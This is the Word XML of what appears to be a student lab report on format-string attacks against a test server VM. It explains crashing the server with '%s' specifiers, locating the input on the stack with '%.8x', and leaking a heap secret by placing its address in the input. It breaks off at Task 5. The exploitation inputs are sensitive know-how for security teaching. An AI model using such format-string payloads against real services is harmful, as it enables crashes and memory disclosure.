    <w:p w14:paraId="73599BCD" w14:textId="74825F7D" w:rsidR="008F58A2" w:rsidRDefault="008F58A2" w:rsidP="008F58A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[] address: 0xbffff0d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48962643" w14:textId="4CB5CD5B" w:rsidR="008F58A2" w:rsidRDefault="008F58A2" w:rsidP="008F58A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the distance between format string and buf[]: 96bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A6FB9" w14:textId="77777777" w:rsidR="00F93909" w:rsidRDefault="00F93909"/>
    <w:p w14:paraId="2907C66A" w14:textId="77777777" w:rsidR="00F93909" w:rsidRDefault="00F93909"/>
    <w:p w14:paraId="446F5B67" w14:textId="77777777" w:rsidR="00594152" w:rsidRDefault="00594152"/>
    <w:p w14:paraId="4E22B102" w14:textId="77777777" w:rsidR="004E4297" w:rsidRDefault="004E4297"/>
    <w:p w14:paraId="23ED6BED" w14:textId="77777777" w:rsidR="004E4297" w:rsidRDefault="004E4297"/>
    <w:p w14:paraId="7F1266B7" w14:textId="6CB867AA" w:rsidR="00594152" w:rsidRDefault="00594152">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594152">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task3: Crash the Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18FB58" w14:textId="317C9961" w:rsidR="00B13178" w:rsidRDefault="0075222F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504AD450" wp14:editId="349ACB78">
            <wp:extent cx="5939790" cy="1564005"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795"/>
            <wp:docPr id="11" name="Picture 11" descr="../../../../Desktop/Screen%20Shot%202018-10-13%20at%201.2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13%20at%201.23.5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1564005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414EF77" w14:textId="41D56D6B" w:rsidR="0075222F" w:rsidRDefault="0075222F">
      <w:r>
        <w:t xml:space="preserve">screenshot1, after we run the program on the server, we send message </w:t>
      </w:r>
      <w:r w:rsidR="00810A0E">
        <w:t>from attacker to the server. And the message contains 8 “%s”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52B423" w14:textId="77777777" w:rsidR="00810A0E" w:rsidRDefault="00810A0E"/>
    <w:p w14:paraId="33D37F62" w14:textId="3D125259" w:rsidR="00810A0E" w:rsidRDefault="00F72677">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433FED42" wp14:editId="4BDECAAE">
            <wp:extent cx="5939790" cy="2040255"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="54" name="Picture 54" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%208.5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10-17%20at%208.58.0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2040255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F93DAD" w14:textId="5BF2AEEC" w:rsidR="00810A0E" w:rsidRDefault="00810A0E">
      <w:r>
        <w:t>screenshot2, we go back to the server, the server program is crashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D774A" w14:textId="77777777" w:rsidR="00195CF4" w:rsidRDefault="00195CF4"/>
    <w:p w14:paraId="55262294" w14:textId="0D8CFF78" w:rsidR="00195CF4" w:rsidRPr="00195CF4" w:rsidRDefault="00195CF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195CF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330979A8" w14:textId="76BE63FD" w:rsidR="00195CF4" w:rsidRDefault="00195CF4">
      <w:r>
        <w:tab/>
        <w:t>In this task, we want to send message to the server, and such message can crash the server program on the server. As screenshot 1 and 2 show, after we sent message with 8 “%s”, the server program is crashed. The %s specifier is the reason, when printf() sees the %s, it treats the value which obtained by the %s specifier as an address, and then it prints out the data from that address.</w:t>
      </w:r>
      <w:r w:rsidR="009319D0">
        <w:t xml:space="preserve"> However, these addresses are not intended input for printf(), so there </w:t>
      </w:r>
      <w:r w:rsidR="00676DA4">
        <w:t>are maybe some invalid address or privileged address. As a result, when printf() prints data from a invalid address or privileged address, the program crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD236D4" w14:textId="77777777" w:rsidR="00B6487E" w:rsidRDefault="00B6487E"/>
    <w:p w14:paraId="078E39B6" w14:textId="77777777" w:rsidR="00B6487E" w:rsidRDefault="00B6487E"/>
    <w:p w14:paraId="75316579" w14:textId="56148FB8" w:rsidR="00195CF4" w:rsidRPr="00B6487E" w:rsidRDefault="00B6487E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6487E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task4: Print Out the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FA4DE" w14:textId="77777777" w:rsidR="00B6487E" w:rsidRPr="00B6487E" w:rsidRDefault="00B6487E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDA7317" w14:textId="65BEFF9F" w:rsidR="00B6487E" w:rsidRPr="00B6487E" w:rsidRDefault="00B6487E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6487E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task4.A: Stack Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073CE52" w14:textId="3D292937" w:rsidR="00B6487E" w:rsidRDefault="00476FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F415D0" wp14:editId="69715DD2">
            <wp:extent cx="5924550" cy="574040"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="63" name="Picture 63" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.2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10-17%20at%209.21.0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4550" cy="574040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC19864" w14:textId="7BED0919" w:rsidR="00B6487E" w:rsidRDefault="00B6487E">
      <w:r>
        <w:t xml:space="preserve">screenshot1, we </w:t>
      </w:r>
      <w:r w:rsidR="001F1DD9">
        <w:t>make up a message and send it to the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3641F" w14:textId="77777777" w:rsidR="00B6487E" w:rsidRDefault="00B6487E"/>
    <w:p w14:paraId="2BDBDCA0" w14:textId="155CF516" w:rsidR="00B6487E" w:rsidRDefault="00B15A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771CF956" wp14:editId="3A421CF0">
            <wp:extent cx="5924550" cy="1065530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="89" name="Picture 89" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.00.48%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1065530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034A948" w14:textId="3436E665" w:rsidR="00B6487E" w:rsidRDefault="00B6487E">
      <w:r>
        <w:t xml:space="preserve">screenshot2, </w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8">
        <w:t>then we go back to the server VM. And we see that in the 24</w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8" w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8">
        <w:t xml:space="preserve"> position, our input is printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D35332" w14:textId="77777777" w:rsidR="00B6487E" w:rsidRDefault="00B6487E"/>
    <w:p w14:paraId="71188AFF" w14:textId="750957D6" w:rsidR="00B6487E" w:rsidRPr="00B6487E" w:rsidRDefault="00B6487E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6487E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D6957" w14:textId="2593E6ED" w:rsidR="006B5BE8" w:rsidRDefault="00B6487E">
      <w:r>
        <w:tab/>
        <w:t>In this task, we want to print out our input in the stack by the server</w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8">
        <w:t xml:space="preserve"> prog</w:t>
      </w:r>
      <w:r w:rsidR="00057A2B">
        <w:t>ram. We first send message, the</w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8">
        <w:t xml:space="preserve"> message </w:t>
      </w:r>
      <w:r w:rsidR="00057A2B">
        <w:t>consists</w:t>
      </w:r>
      <w:r w:rsidR="006B5BE8">
        <w:t xml:space="preserve"> two parts, first part is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DED684" w14:textId="0D8F1888" w:rsidR="006B5BE8" w:rsidRPr="006B5BE8" w:rsidRDefault="006B5BE8" w:rsidP="006B5BE8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“$(printf "\x11\x11\x11\x11@@@@\x22\x22\x22\x22")”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACDD97" w14:textId="42D4086E" w:rsidR="006B5BE8" w:rsidRDefault="006B5BE8">
      <w:r>
        <w:t>this will write 11111111, 40404040</w:t>
      </w:r>
      <w:r w:rsidR="00057A2B">
        <w:t xml:space="preserve"> (@@@@)</w:t>
      </w:r>
      <w:r>
        <w:t>, and 22222222 on the</w:t>
      </w:r>
      <w:r w:rsidR="00982A55">
        <w:t xml:space="preserve"> stack</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B615CD0" w14:textId="27787228" w:rsidR="00B6487E" w:rsidRDefault="006B5BE8">
      <w:r>
        <w:t>The second part is 30 “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>%.8x</w:t>
      </w:r>
      <w:r>
        <w:t>”, this will move the var_list pointer to next position and print the value in that position. Because we use 30 “%.80”, 30 value will be printed out</w:t>
      </w:r>
      <w:r w:rsidR="00EC3907">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B6487E">
        <w:t>y the screenshot1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and 2 show, there are 30 values are printed. And in the 24</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>, 25</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>, and 26</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5BE8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> positions, we see the input provided by us. Therefore, we need 24 specifier</w:t>
      </w:r>
      <w:r w:rsidR="00966D41">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reach the buf[] position</w:t>
      </w:r>
      <w:r w:rsidR="00C22230">
        <w:t xml:space="preserve"> to print out first 4 bytes of </w:t>
      </w:r>
      <w:r w:rsidR="00943CB0">
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidR="00C22230">
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E2B64" w14:textId="77777777" w:rsidR="00FC09F6" w:rsidRDefault="00FC09F6"/>
    <w:p w14:paraId="38F1B9B7" w14:textId="77777777" w:rsidR="00E84BA1" w:rsidRDefault="00E84BA1"/>
    <w:p w14:paraId="62888849" w14:textId="2756755C" w:rsidR="00FC09F6" w:rsidRPr="00896BE5" w:rsidRDefault="00FC09F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC09F6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task4.B Heap Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A7B87" w14:textId="7E419633" w:rsidR="00FC09F6" w:rsidRDefault="00476FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11715006" wp14:editId="3961F6B0">
            <wp:extent cx="5939790" cy="1254760"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="59" name="Picture 59" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.1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10-17%20at%209.14.0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1254760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03015382" w14:textId="7E515F55" w:rsidR="00896BE5" w:rsidRDefault="00896BE5">
      <w:r>
        <w:t>screenshot1, we first run the server program, so we know the address of the secret which is 0x080487c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA4FC00" w14:textId="77777777" w:rsidR="00A16AE0" w:rsidRDefault="00A16AE0"/>
    <w:p w14:paraId="27DC9EF5" w14:textId="4B3605C0" w:rsidR="00476FE1" w:rsidRDefault="00476FE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B1970B0" wp14:editId="4EDB3967">
            <wp:extent cx="5924550" cy="513715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="Picture 65" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.2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10-17%20at%209.22.3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513715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF75AE" w14:textId="1ED59FB4" w:rsidR="00476FE1" w:rsidRDefault="00476FE1">
      <w:r>
        <w:t>screenshot2, we make a message and send it to the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513ACB6" w14:textId="77777777" w:rsidR="00476FE1" w:rsidRDefault="00476FE1"/>
    <w:p w14:paraId="57B4CE7E" w14:textId="50CB4459" w:rsidR="00A16AE0" w:rsidRDefault="00B15A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11814A9A" wp14:editId="2724FB59">
            <wp:extent cx="5924550" cy="1042670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="Picture 86" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.58.3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4550" cy="1042670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E4FEF" w14:textId="5907217B" w:rsidR="00A16AE0" w:rsidRDefault="00A16AE0">
      <w:r>
        <w:t xml:space="preserve">screenshot3, </w:t>
      </w:r>
      <w:r w:rsidR="00476FE1">
        <w:t>the target address is written in the 24</w:t>
      </w:r>
      <w:r w:rsidR="00476FE1" w:rsidRPr="00476FE1">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00476FE1">
        <w:t xml:space="preserve"> position as we expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D3CED" w14:textId="77777777" w:rsidR="00861C7B" w:rsidRDefault="00861C7B"/>
    <w:p w14:paraId="027230C6" w14:textId="73B88B2F" w:rsidR="00CC5985" w:rsidRDefault="00B15A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206DD03C" wp14:editId="65BBE121">
            <wp:extent cx="5924550" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="Picture 87" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.59.0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914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207C221" w14:textId="2B2239B1" w:rsidR="00CC5985" w:rsidRDefault="00CC5985">
      <w:r>
        <w:t>screenshot4, we change the input string on attacker VM, we change the 24</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5985">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “%.8x” to %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1A420" w14:textId="77777777" w:rsidR="00CC5985" w:rsidRDefault="00CC5985"/>
    <w:p w14:paraId="5B0BFB83" w14:textId="699F7B59" w:rsidR="00CC5985" w:rsidRDefault="00B15A3A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43ABF882" wp14:editId="3F0623FD">
            <wp:extent cx="5924550" cy="1503680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="Picture 88" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.59.2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4550" cy="1503680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B278" w14:textId="6E50ECC3" w:rsidR="00CC5985" w:rsidRDefault="00CC5985">
      <w:r>
        <w:t>screenshot5, the content of the secret is printed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0BA95" w14:textId="77777777" w:rsidR="002265F9" w:rsidRDefault="002265F9"/>
    <w:p w14:paraId="297C5AD2" w14:textId="13F3A89B" w:rsidR="00CC5985" w:rsidRPr="00CC5985" w:rsidRDefault="00CC5985">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5985">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD31D8" w14:textId="28A7C1B4" w:rsidR="00930007" w:rsidRDefault="00CC5985">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we want to print the content of a secret, and the secret is stored in the </w:t>
      </w:r>
      <w:r w:rsidR="002C2648">
        <w:t>heap. The first thing is to get the address of the secret, we run the server program, and the program will print it out which is 0x080487c0. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hen we </w:t>
      </w:r>
      <w:r w:rsidR="00EC3907">
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">put the </w:t>
      </w:r>
      <w:r w:rsidR="002C2648">
        <w:t xml:space="preserve">secret’s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">address in the </w:t>
      </w:r>
      <w:r w:rsidR="00617F92">
        <w:t>buf[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="00055FD0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C2648">
        <w:t>(prinf(“\xc0\x87\x</w:t>
      </w:r>
      <w:r w:rsidR="002C0FCC">
        <w:t>04\x08</w:t>
      </w:r>
      <w:r w:rsidR="002C2648">
        <w:t>”))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00930007">
        <w:t>Because we know that the buf[] is 24 position away, and the secret address is written in the buf[], so we move the var_list pointer 24 positions to reach to the buf[]</w:t>
      </w:r>
      <w:r w:rsidR="007C7965">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F21D1F">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r>
        <w:t>e can use “%</w:t>
      </w:r>
      <w:r w:rsidR="00930007">
        <w:t>.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">x” move pointer to there, and then we use “%s” to print out the value which is stored on this address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597F81C" w14:textId="53598C1A" w:rsidR="00CC5985" w:rsidRDefault="00CC5985" w:rsidP="00930007">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>By running the server program, it prints out the address of the secret to us (screenshot1). After we got the address, we put it in the</w:t>
      </w:r>
      <w:r w:rsidR="00617F92">
        <w:t xml:space="preserve"> buf[]</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t>, and we also use “%.8x” to move the pointer to find where the address is stored (screesnhot2). As screenshto3 shows, we find it, it is stored in the 24</w:t>
      </w:r>
      <w:r w:rsidR="002370D8" w:rsidRPr="002370D8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00766C16">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“%.8x”</w:t>
      </w:r>
      <w:r w:rsidR="00617F92">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we expected</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t>. Then we modify our input, we change the 24</w:t>
      </w:r>
      <w:r w:rsidR="002370D8" w:rsidRPr="002370D8">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t xml:space="preserve"> “%.8x” to “%s”, which will pint the content </w:t>
      </w:r>
      <w:r w:rsidR="003B1103">
        <w:t>of the address which stored in there</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t>. As screenshot5 shows, the content of the secret is printed</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:t xml:space="preserve"> which is “A secret message”</w:t>
      </w:r>
      <w:r w:rsidR="002370D8">
        <w:t>. So our attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF5260" w14:textId="77777777" w:rsidR="000F3C07" w:rsidRDefault="000F3C07"/>
    <w:p w14:paraId="3D37D723" w14:textId="77777777" w:rsidR="000F3C07" w:rsidRDefault="000F3C07"/>
    <w:p w14:paraId="661C404B" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="64DB7DBF" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="5373F5EE" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="22AE9ABB" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="1F72C7A9" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="11625C10" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="05729819" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="1841B919" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="2C66A889" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="795C48F0" w14:textId="77777777" w:rsidR="00172288" w:rsidRDefault="00172288"/>
    <w:p w14:paraId="22451E47" w14:textId="24394540" w:rsidR="000F3C07" w:rsidRPr="00090BC5" w:rsidRDefault="000F3C07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00090BC5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task5: Change the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ABE0A" w14:textId="77777777" w:rsidR="000F3C07" w:rsidRDefault="000F3C07"/>
    <w:p w14:paraId="442263E5" w14:textId="3847F9FF" w:rsidR="000F3C07" w:rsidRDefault="000F3C07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00090BC5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task5.A: Change the value to a different value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE9EE69" w14:textId="3874E449" w:rsidR="00981F38" w:rsidRDefault="00217884">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="015CD27C" wp14:editId="27CB2C72">
            <wp:extent cx="5939790" cy="1526540"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="69" name="Picture 69" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.2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10-17%20at%209.28.28%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1526540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
